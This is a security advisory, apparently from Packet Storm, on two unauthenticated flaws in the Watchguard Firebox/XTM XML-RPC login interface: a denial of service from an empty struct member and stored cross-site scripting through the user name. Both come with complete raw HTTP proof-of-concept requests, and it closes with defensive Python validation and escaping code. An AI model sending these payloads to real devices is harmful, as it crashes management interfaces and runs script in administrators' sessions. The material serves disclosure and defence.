Watchguard Firebox / XTM XML-RPC Empty Member Denial Of Service

19 Sep 2017 00:00:00 | Reported by David Fernandez | Type: packetstorm | Source: packetstormsecurity.com

Watchguard Firebox / XTM XML-RPC DoS vulnerabilities

Related

| Source | Title | Published |
|---|---|---|
| Circl | CVE-2017-8056 | 30 Mar 2025 21:01 |
| CNVD | WatchGuard Fireware Denial of Service Vulnerability | 24 Apr 2017 00:00 |
| CVE | CVE-2017-8056 | 22 Apr 2017 22:00 |
| Cvelist | CVE-2017-8056 | 22 Apr 2017 22:00 |
| NVD | CVE-2017-8056 | 22 Apr 2017 22:59 |
| Prion | Xxe | 22 Apr 2017 22:59 |
| RedhatCVE | CVE-2017-8056 | 22 May 2025 10:40 |
Watchguard's Firebox and XTM are a series of enterprise-grade network  
security appliances providing advanced security services such as next-  
generation firewall, intrusion prevention, malware detection and  
blocking, and others. Two vulnerabilities were discovered affecting the  
XML-RPC interface of the Web UI used to manage Fireware OS, the  
operating system running on Watchguard Firebox and XTM appliances.  
Exploiting either of the discovered flaws requires no authentication on  
the Web UI.  
---------------------------------------------------------------------------  
XML-RPC Empty Member DoS  
  
Versions Affected  
Fireware OS versions below v12.0 were found to be vulnerable.  
  
CVE Reference  
The vendor assigned internal id FBX-5312 to this vulnerability and will  
release a Knowledge Base article following this advisory.  
  
Vendor Fix  
The vendor fixed the vulnerability in their v12 release.  
  
Credit  
David Fernandez of Sidertia Solutions  
  
Description  
If a login attempt is made on the XML-RPC interface with an XML message  
containing an empty member tag, the wgagent crashes, logging out every  
user with an open session in the UI. By continuously repeating the  
failed login attempts, the device becomes impossible to manage through  
the UI. It was not tested whether this flaw causes a similar lockout  
and degradation in connectivity as my previous CVE-2017-8056.  
  
Proof of concept  
Below is an example of the request that causes a crash in the XML-RPC wgagent:  
  
POST /agent/login HTTP/1.1  
Host: fireware-host:4100  
Connection: close  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Encoding: gzip, deflate, sdch, br  
Accept-Language: es,en;q=0.8,ca;q=0.6  
Cookie: sessionid=dasdasdas  
Content-Length: 207  
Content-Type: application/xml  
  
<methodCall><methodName>login</methodName><params><param><value><struct><member></member><member><name>user</name><value><string>admin</string></value></member></struct></value></param></params></methodCall>  
  
Links  
https://www.sidertia.com/Home/Community/Blog/2017/09/18/Fixed-Fireware-XXE-DOS-and-stored-XSS-vulnerabilities-discovered-by-Sidertia  
  
---------------------------------------------------------------------  
  
XML-RPC Username Stored Cross Site Scripting  
  
Versions Affected  
Fireware OS versions below v12.0 were found to be vulnerable.  
  
CVE Reference  
The vendor assigned internal id FBX-5313 to this vulnerability and will  
release a Knowledge Base article following this advisory.  
  
Vendor Fix  
The vendor fixed the vulnerability in their v12 release.  
  
Credit  
David Fernandez of Sidertia Solutions  
  
Description  
When a failed login attempt is made against the login endpoint of the  
XML-RPC interface with JavaScript code, properly encoded for consumption  
by XML parsers, embedded as the value of the user tag, the code is  
rendered in the context of any logged-in user of the Web UI who visits  
the "Traffic Monitor" sections "Events" and "All". As a side effect, no  
further events are visible in the Traffic Monitor until the device is  
restarted.  
  
Proof of concept  
POST /agent/login HTTP/1.1  
Host: fireware-host:4100  
Connection: close  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Encoding: gzip, deflate, sdch, br  
Accept-Language: es,en;q=0.8,ca;q=0.6  
Cookie: sessionid=dasdasdas  
Content-Length: 298  
Content-Type: application/xml  
  
<methodCall><methodName>login</methodName><params><param><value><struct><member></member><member><name>user</name><value><string>aa<img onerror=alert('xss') src=>a</string></value></member></struct></value></param></params></methodCall>  
  
Links  
https://www.sidertia.com/Home/Community/Blog/2017/09/18/Fixed-Fireware-XXE-DOS-and-stored-XSS-vulnerabilities-discovered-by-Sidertia  
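Both flaws above come down to a struct member that is neither checked for shape before use nor encoded before display. The Python below is an added example, not Fireware code: a strict schema check that refuses the empty `<member>` from the first description, and HTML escaping of the user value before it reaches a Traffic Monitor style event line as in the second. The request bodies are constructed from the advisory's proofs of concept, and `parse_login_struct` / `handle_login` are assumed names.

```python
import html
import xml.etree.ElementTree as ET

# Constructed from the advisory's first proof of concept: the empty <member>.
EMPTY_MEMBER_BODY = (
    "<methodCall><methodName>login</methodName><params><param><value><struct>"
    "<member></member><member><name>user</name><value><string>admin</string>"
    "</value></member></struct></value></param></params></methodCall>"
)
# Constructed: a well-formed struct whose user name carries XML-encoded markup.
MARKUP_USER_BODY = (
    "<methodCall><methodName>login</methodName><params><param><value><struct>"
    "<member><name>user</name><value><string>aa&lt;img onerror=alert('xss') "
    "src=&gt;a</string></value></member></struct></value></param></params>"
    "</methodCall>"
)

class BadRequest(ValueError):
    """Body does not match the expected login schema."""

def parse_login_struct(body: str) -> dict:
    """Return the login struct as {name: value}; reject anything off-schema."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        raise BadRequest("malformed XML") from None
    if root.tag != "methodCall" or root.findtext("methodName") != "login":
        raise BadRequest("not a login call")
    struct = root.find("params/param/value/struct")
    if struct is None:
        raise BadRequest("login struct missing")
    fields = {}
    for member in struct:
        name, value = member.find("name"), member.find("value/string")
        # <member></member> has neither child: refuse it here instead of
        # letting the agent dereference a missing name or value and crash.
        if member.tag != "member" or name is None or value is None or not name.text:
            raise BadRequest("struct member lacks name or value")
        fields[name.text] = value.text or ""
    if "user" not in fields:
        raise BadRequest("user member missing")
    return fields

def handle_login(body: str) -> tuple:
    """Validate, then build the event line (credential check assumed elsewhere).
    html.escape makes markup in the user name display literally in the UI."""
    try:
        fields = parse_login_struct(body)
    except BadRequest as exc:
        return ("rejected", str(exc))
    return ("event", f"<li>Failed login for user {html.escape(fields['user'])}</li>")
```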
